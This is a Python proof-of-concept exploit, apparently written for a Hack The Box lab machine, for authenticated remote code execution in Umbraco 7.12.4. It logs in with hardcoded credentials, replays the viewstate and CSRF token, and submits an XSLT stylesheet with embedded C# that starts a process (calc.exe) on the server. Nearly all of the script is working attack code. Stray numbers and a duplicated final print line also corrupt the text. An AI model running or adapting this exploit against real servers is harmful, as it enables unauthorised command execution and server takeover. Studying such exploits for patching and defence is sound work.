# Umbraco 7.12.4 authenticated XSLT remote code execution PoC
# (originally posted Mar 26, 2020).
#
# The script logs into the Umbraco back office and abuses the XSLT
# visualizer, which compiles embedded C# server-side, to run a command
# (calc.exe) on the target.

# requests drives the HTTP session: cookies, JSON/form POSTs, TLS, etc.
import requests

# BeautifulSoup parses the returned HTML so we can scrape the ASP.NET
# __VIEWSTATE / __VIEWSTATEGENERATOR hidden form fields.
from bs4 import BeautifulSoup
10
def print_dict(dico):
    """Print every (key, value) pair of the mapping *dico* to stdout.

    Used below to dump the session cookies the server sets; works for any
    object exposing a dict-like ``items()`` (including a RequestsCookieJar).
    """
    print(dico.items())
14
print("Start")

# ---------------------------------------------------------------------------
# XSLT payload
#
# Umbraco's XSLT visualizer compiles <msxsl:script> blocks with the .NET
# XslCompiledTransform, so the embedded C# below executes on the server
# (a Windows host -- it launches calc.exe as a harmless proof of concept).
# The C# function starts the process with stdout redirected, reads its
# output and returns it as the transform result, so command output comes
# back in the HTTP response.
# ---------------------------------------------------------------------------
payload = '''
<?xml version="1.0"?>
<xsl:stylesheet
    version="1.0"
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:msxsl="urn:schemas-microsoft-com:xslt"
    xmlns:csharp_user="http://csharp.mycompany.com/mynamespace"
>

<msxsl:script language="C#" implements-prefix="csharp_user">
    public string xml()
    {
        string cmd = "";
        System.Diagnostics.Process
            proc = new System.Diagnostics.Process();
        proc.StartInfo.FileName = "calc.exe";
        proc.StartInfo.Arguments = cmd;
        proc.StartInfo.UseShellExecute = false;
        proc.StartInfo.RedirectStandardOutput = true;
        proc.Start();
        string output = proc.StandardOutput.ReadToEnd();
        return output;
    }
</msxsl:script>

<xsl:template match="/">
    <xsl:value-of select="csharp_user:xml()"/>
</xsl:template>
</xsl:stylesheet> '''

# Back-office credentials and target host.
login = "admin@htb.local"
password = "baconandcheese"
host = "http://10.10.10.180"

# Step 1 - Get the main page.
# A Session persists cookies across requests, like a browser would.
s = requests.Session()

url_main = host + "/umbraco/"
r1 = s.get(url_main)

# Show the cookies the server set. Uncomment the next line to see the raw
# cookie jar (names and values) instead of the items view.
# print(r1.cookies)
print_dict(r1.cookies)

# Step 2 - Process login.
# The authentication endpoint expects the credentials as a JSON body.
url_login = host + "/umbraco/backoffice/UmbracoApi/Authentication/PostLogin"
loginfo = {"username": login, "password": password}
r2 = s.post(url_login, json=loginfo)

# Step 3 - Fetch the vulnerable XSLT visualizer page.
url_xslt = host + "/umbraco/developer/Xslt/xsltVisualize.aspx"
r3 = s.get(url_xslt)

# Scrape the ASP.NET anti-tampering hidden fields out of the form; the
# server rejects the POST unless they are echoed back unchanged.
soup = BeautifulSoup(r3.text, 'html.parser')
VIEWSTATE = soup.find(id="__VIEWSTATE")['value']
VIEWSTATEGENERATOR = soup.find(id="__VIEWSTATEGENERATOR")['value']

# The anti-CSRF token is delivered as a cookie and must be replayed in a
# request header for the back office to accept the request.
UMBXSRFTOKEN = s.cookies['UMB-XSRF-TOKEN']
headers = {'UMB-XSRF-TOKEN': UMBXSRFTOKEN}

# Form fields for the visualizer postback; the stylesheet payload goes in
# the "xsltSelection" textarea.
data = {
    "__EVENTTARGET": "",
    "__EVENTARGUMENT": "",
    "__VIEWSTATE": VIEWSTATE,
    "__VIEWSTATEGENERATOR": VIEWSTATEGENERATOR,
    "ctl00$body$xsltSelection": payload,
    "ctl00$body$contentPicker$ContentIdValue": "",
    "ctl00$body$visualizeDo": "Visualize+XSLT",
}

# Step 4 - Launch the attack: submitting the stylesheet for "visualization"
# compiles and runs the embedded C#. Print r4.text to see the server output.
r4 = s.post(url_xslt, data=data, headers=headers)

print("End")
135print("End");